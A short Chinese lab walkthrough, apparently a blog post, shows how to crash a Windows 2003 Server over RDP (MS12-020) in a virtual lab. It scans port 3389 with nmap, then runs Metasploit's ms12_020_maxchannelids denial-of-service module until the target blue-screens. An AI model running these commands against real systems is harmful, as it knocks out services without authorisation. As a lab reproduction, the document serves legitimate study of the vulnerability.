通过Metasploit对MS12-020漏洞的简单利用

前期准备

攻击机:kali

靶机:Windows_2003_server(打开3389端口)

环境配置

两台虚拟机以NAT模式连接

接着右键单机我的电脑,点击属性

image-20211115150638194

选择远程,将该靶机的远程控制系统打开(3389端口即可开启)

image-20211115150732106

复现过程

查看本机ip

image-20211115150958439

nmap扫描网段是否开启3389端口

1
nmap -p 3389 192.168.222.0/24

image-20211115151322552

发现192.168.222.135开放3389端口

启动Metasploit

1
msfconsole

image-20211115151454509

搜索ms12-020模块

1
search ms12-020

image-20211115151653804

利用第一个模块

1
use auxiliary/dos/windows/rdp/ms12_020_maxchannelids

image-20211115151740640

查看可利用选项

1
show options

image-20211115151847743

建立连接

1
set rhost 192.168.222.135

image-20211115151943651

运行

1
run

image-20211115152020188

成功复现,靶机蓝屏

image-20211115152121354